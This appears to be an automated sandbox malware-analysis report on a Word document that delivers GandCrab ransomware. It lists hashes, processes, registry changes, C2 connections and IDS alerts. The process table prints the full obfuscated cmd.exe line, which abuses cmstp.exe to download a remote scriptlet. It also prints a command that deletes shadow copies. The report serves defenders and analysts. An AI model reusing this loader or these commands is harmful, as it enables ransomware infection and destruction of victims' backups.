| File name: | eFax_Dokument.doc |
| Full analysis: | https://app.any.run/tasks/06693ee4-894d-418d-8fa2-022d8ae854fa |
| Verdict: | Malicious activity |
| Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
| Analysis date: | March 21, 2019, 19:10:54 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Thu Mar 21 14:35:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0 |
| MD5: | B6A6641BAF74CFDC80F28F7EC2B56347 |
| SHA1: | AEA672AF6D6E1CDB20F1C7B281D53DB506200559 |
| SHA256: | 7E2D088E4950E867E875C547206795683070FA25E8C90AD301D3763B02A252A2 |
| SSDEEP: | 1536:3mMGHuJHHAShblIvD8P1aMxLm/4KnG0zFCFjkT2PXMdo0ZXEFN3FTHHG2bRBjD+w:3mmgKbS+1aMxLm/4KnqFNXM8VTHm2b/ |
MALICIOUS
Application was dropped or rewritten from another process
- 61491.exe (PID: 2724)
SQUIBLYDOO was detected
- cmstp.exe (PID: 2972)
Actions looks like stealing of personal data
- 61491.exe (PID: 2724)
Writes file to Word startup folder
- 61491.exe (PID: 2724)
Renames files like Ransomware
- 61491.exe (PID: 2724)
Dropped file may contain instructions of ransomware
- 61491.exe (PID: 2724)
Deletes shadow copies
- cmd.exe (PID: 976)
Connects to CnC server
- 61491.exe (PID: 2724)
Changes settings of System certificates
- 61491.exe (PID: 2724)
GANDCRAB detected
- 61491.exe (PID: 2724)
SUSPICIOUS
Executable content was dropped or overwritten
- cmstp.exe (PID: 2972)
- 61491.exe (PID: 2724)
Creates files in the user directory
- cmd.exe (PID: 400)
- cmstp.exe (PID: 2972)
- 61491.exe (PID: 2724)
Reads the cookies of Mozilla Firefox
- 61491.exe (PID: 2724)
Creates files in the program directory
- 61491.exe (PID: 2724)
Starts CMD.EXE for commands execution
- 61491.exe (PID: 2724)
Adds / modifies Windows certificates
- 61491.exe (PID: 2724)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 1332)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 1332)
Dropped object may contain Bitcoin addresses
- 61491.exe (PID: 2724)
Dropped object may contain TOR URL's
- 61491.exe (PID: 2724)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | - |
|---|---|
| Subject: | - |
| Author: | Admin |
| Keywords: | - |
| Comments: | - |
| Template: | Normal |
| LastModifiedBy: | Admin |
| RevisionNumber: | 3 |
| Software: | Microsoft Office Word |
| TotalEditTime: | 2.0 minutes |
| CreateDate: | 2019:02:28 14:52:00 |
| ModifyDate: | 2019:03:21 14:35:00 |
| Pages: | 1 |
| Words: | 4 |
| Characters: | 23 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 26 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
47
Monitored processes
9
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 400 | cmd /V /C set "I8=s" && !I8!et "I53=\" && !I8!et "I2=e" && !I8!et "I5=i" && !I8!et "I96=A" && !I8!et "I6=N" && !I8!et "I89=d" && c!I96!ll !I8!et "I0=%!I96!PP!I89!!I96!T!I96!%" && c!I96!ll !I8!et "I31=%R!I96!!I6!!I89!OM%" && !I8!et "I81=!I0!!I53!M!I5!cro!I8!oft!I53!T!I2!mplat!I2!s!I53!!I31!.txt" && !I8!et "I07="^" && (For %i in ("[v!I2!r!I8!ion]" "!I8!ignatur!I2!=$Wi!I6!dow!I8! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!I2!faultIn!I8!tall_Singl!I2!U!I8!er]" "UnR!I2!gi!I8!t!I2!rOCXs=I97" "[I97]" "%11%\%I7_1%%I7_2%%I7_3%,NI,%I_1%%I_2%%I_3%%I_4%%I_5%%I_6%%I_7%%I_8%%I_9%%I_10%%I_11%%I_12%%I_13%%I_14%" "[!I8!tring!I8!]" "I_1=ht" "I_2=tp" "I_3=:/" "I_4=/1" "I_5=34" "I_6=.2" "I_7=09" "I_8=.8" "I_9=8." "I_10=23" "I_11=/a" "I_12=sd" "I_13=.t" "I_14=xt" "I7_2=rO" "I7_1=sC" "I7_3=bJ" ) do @echo %~i)>"!I81!" && echo !I8!erv!I5!ceNam!I2!=!I07! !I07!>>!I81! && echo !I8!hortSvcN!I96!me=!I07! !I07!>>!I81! && c!I96!ll !I8!et "I28=%WI!I6!!I89!IR%" && !I8!t!I96!rt "" !I28!!I53!Sy!I8!t!I2!m32!I53!cm!I8!tp.!I2!x!I2! /s /ns "!I81!" | C:\Windows\system32\cmd.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 976 | "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet | C:\Windows\system32\cmd.exe | 61491.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1332 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\eFax_Dokument.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2384 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2528 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2724 | "C:\Users\admin\AppData\Roaming\Microsoft\61491.exe" | C:\Users\admin\AppData\Roaming\Microsoft\61491.exe | cmstp.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2732 | vssadmin delete shadows /all /quiet | C:\Windows\system32\vssadmin.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2972 | C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\22515.txt" | C:\Windows\System32\cmstp.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile Installer Exit code: 0 Version: 7.02.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3536 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Documents\ZNNBUPAGK-MANUAL.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
1 627
Read events
1 225
Write events
397
Delete events
5
Modification events
| (PID) Process: | (1332) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | ,e7 |
Value: 2C65370034050000010000000000000000000000 | |||
| (PID) Process: | (1332) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (1332) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (1332) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1316290590 | |||
| (PID) Process: | (1332) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1316290704 | |||
| (PID) Process: | (1332) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1316290705 | |||
| (PID) Process: | (1332) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 34050000C4E8D7D719E0D40100000000 | |||
| (PID) Process: | (1332) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | tf7 |
Value: 746637003405000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (1332) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | tf7 |
Value: 746637003405000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (1332) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
Executable files
2
Suspicious files
420
Text files
324
Unknown types
20
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR891C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 1332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFF7E7E2DDCE646FD7.TMP | — | |
MD5:— | SHA256:— | |||
| 1332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ax_Dokument.doc | pgc | |
MD5:— | SHA256:— | |||
| 1332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\57C8C7C1.wmf | wmf | |
MD5:— | SHA256:— | |||
| 1332 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 2724 | 61491.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi | — | |
MD5:— | SHA256:— | |||
| 2972 | cmstp.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\asd[1].txt | xml | |
MD5:— | SHA256:— | |||
| 2724 | 61491.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.znnbupagk | — | |
MD5:— | SHA256:— | |||
| 400 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\Templates\22515.txt | ini | |
MD5:— | SHA256:— | |||
| 1332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\SystemMonitor.exd | tlb | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
2
Threats
12
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2972 | cmstp.exe | GET | 200 | 134.209.88.23:80 | http://134.209.88.23/asd.txt | US | xml | 280 Kb | malicious |
2724 | 61491.exe | POST | 301 | 107.173.49.208:80 | http://www.kakaocorp.link/content/assets/fumokafumo.gif | US | html | 162 b | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2724 | 61491.exe | 107.173.49.208:80 | www.kakaocorp.link | ColoCrossing | US | malicious |
2972 | cmstp.exe | 134.209.88.23:80 | — | — | US | malicious |
2724 | 61491.exe | 107.173.49.208:443 | www.kakaocorp.link | ColoCrossing | US | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.kakaocorp.link |
| malicious |
kakaocorp.link |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2972 | cmstp.exe | A Network Trojan was detected | MALWARE [PTsecurity] Squiblydoo Scriptlet |
2724 | 61491.exe | A Network Trojan was detected | ET POLICY Data POST to an image file (gif) |
2724 | 61491.exe | A Network Trojan was detected | MALWARE [PTsecurity] GandCrab Ransomware HTTP |
2724 | 61491.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
2724 | 61491.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
2724 | 61491.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
2724 | 61491.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
2724 | 61491.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
2724 | 61491.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
3 ETPRO signatures available at the full report